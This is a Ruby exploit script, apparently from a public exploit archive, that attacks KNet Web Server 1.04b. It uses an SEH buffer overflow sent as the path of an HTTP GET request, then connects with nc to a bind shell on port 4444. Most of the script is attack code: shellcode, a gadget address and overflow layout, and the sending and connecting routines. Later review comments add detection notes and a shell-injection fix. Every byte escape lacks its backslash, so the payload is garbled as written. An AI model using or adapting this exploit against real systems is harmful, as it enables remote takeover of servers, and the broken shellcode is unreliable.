# Title : KNet Web Server 1.04b - Buffer Overflow SEH
# Published : 2013-03-29
# Author :
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# sc_bind: the payload that is appended to the overflow buffer below.
# The author's "bind port 4444" note and the `nc <host> 4444` call further
# down indicate a bind shell listening on TCP/4444 -- that listener is the
# host-side artifact a defender would look for after a successful run.
# NOTE(review): every byte escape in this copy reads as a bare "x.." pair
# (no backslash), so the literal as it appears here is plain ASCII text,
# not the raw bytes the author wrote; treat it as a reference transcript.
sc_bind =
"xbdx0ex27x05xabxdaxdbxd9x74x24xf4x5ax33xc9" +
"xb1x56x83xc2x04x31x6ax0fx03x6ax01xc5xf0x57" +
"xf5x80xfbxa7x05xf3x72x42x34x21xe0x06x64xf5" +
"x62x4ax84x7ex26x7fx1fxf2xefx70xa8xb9xc9xbf" +
"x29x0cxd6x6cxe9x0exaax6ex3dxf1x93xa0x30xf0" +
"xd4xddxbaxa0x8dxaax68x55xb9xefxb0x54x6dx64" +
"x88x2ex08xbbx7cx85x13xecx2cx92x5cx14x47xfc" +
"x7cx25x84x1ex40x6cxa1xd5x32x6fx63x24xbax41" +
"x4bxebx85x6dx46xf5xc2x4axb8x80x38xa9x45x93" +
"xfaxd3x91x16x1fx73x52x80xfbx85xb7x57x8fx8a" +
"x7cx13xd7x8ex83xf0x63xaax08xf7xa3x3ax4axdc" +
"x67x66x09x7dx31xc2xfcx82x21xaaxa1x26x29x59" +
"xb6x51x70x36x7bx6cx8bxc6x13xe7xf8xf4xbcx53" +
"x97xb4x35x7ax60xbax6cx3axfex45x8ex3bxd6x81" +
"xdax6bx40x23x62xe0x90xccxb7xa7xc0x62x67x08" +
"xb1xc2xd7xe0xdbxccx08x10xe4x06x3fx16x2ax72" +
"x6cxf1x4fx84x83x5dxd9x62xc9x4dx8fx3dx65xac" +
"xf4xf5x12xcfxdexa9x8bx47x56xa4x0bx67x67xe2" +
"x38xc4xcfx65xcax06xd4x94xcdx02x7cxdexf6xc5" +
"xf6x8exb5x74x06x9bx2dx14x95x40xadx53x86xde" +
"xfax34x78x17x6exa9x23x81x8cx30xb5xeax14xef" +
"x06xf4x95x62x32xd2x85xbaxbbx5exf1x12xeax08" +
"xafxd4x44xfbx19x8fx3bx55xcdx56x70x66x8bx56" +
"x5dx10x73xe6x08x65x8cxc7xdcx61xf5x35x7dx8d" +
"x2cxfex8dxc4x6cx57x06x81xe5xe5x4bx32xd0x2a" +
"x72xb1xd0xd2x81xa9x91xd7xcex6dx4axaax5fx18" +
"x6cx19x5fx09"
###########################################
# Overflow buffer that becomes the request path. Layout, per the author's
# own notes: 1234 filler bytes, the nSEH slot, the SEH slot (a
# pop esi / pop ebp / ret sequence at 0x6C2474E3 in crtdll.dll), 80 filler
# bytes, the sc_bind payload, then 80 trailing filler bytes.
# Detection note: the server sees one GET whose URI is thousands of
# characters of mostly repeated filler -- a distinctive request shape.
filler_head = "x90" * 1234
nseh_slot = "xFFx64x24x5C"   # nSEH: the author's short jump to ESP+5C
seh_slot = "xE3x74x24x6C"    # SEH handler: the crtdll.dll gadget above
filler_tail = "x90" * 80
sploit = [filler_head, nseh_slot, seh_slot, filler_tail, sc_bind, filler_tail].join
########################################
# Print the banner, then take the host (optionally host:port) verbatim from
# the first CLI argument. Nothing validates it here: with no argument,
# target is nil and the failure surfaces later as a TypeError when
# 'http://' is prepended to it.
puts "KNet Web Server - Buffer Overflow SEH Exploitrn by Myo Soe, http://yehg.net/nn"
target = ARGV.first
# Sends the overflow buffer as the path of a single HTTP GET to host t and
# returns the Net::HTTP response (the value of the start block).
# t is used as given after 'http://', so it may carry an explicit port;
# s is the buffer assembled at file level.
# NOTE(review): there is no rescue, so a refused connection or a dropped
# socket raises out of this method into whichever thread called it.
def exploit(t, s)
  base = 'http://' + t
  puts "[*] Sending exploit to #{base}...n"
  uri = URI.parse(base)
  Net::HTTP.start(uri.host, uri.port) do |http|
    http.get('/' + s)
  end
end
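# Waits one second (presumably to let the payload's listener come up --
# confirm against the author's "bind port 4444" note), prints a status
# line, then hands the terminal to `nc <t> 4444`.
# Returns what Kernel#system returns: true/false for nc's exit status, or
# nil when nc could not be started at all.
# Fix: the original interpolated t into one shell string, so any shell
# metacharacter in the argument was interpreted by the shell. Passing nc an
# argument vector bypasses the shell entirely; the semantics are otherwise
# unchanged.
def connect(t)
  sleep(1)
  puts "[*] Opening Shell ..nn"
  system('nc', t, '4444')
end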
# Run both halves concurrently: the HTTP request, and -- because connect
# sleeps for one second first -- the nc client shortly after. Joining each
# thread in turn re-raises any exception that thread died with, so a
# failed request does not go unnoticed.
# NOTE(review): the fixed one-second delay is a race, not a handshake; the
# two threads never coordinate.
workers = [
  Thread.new { exploit(target, sploit) },
  Thread.new { connect(target) }
]
workers.each(&:join)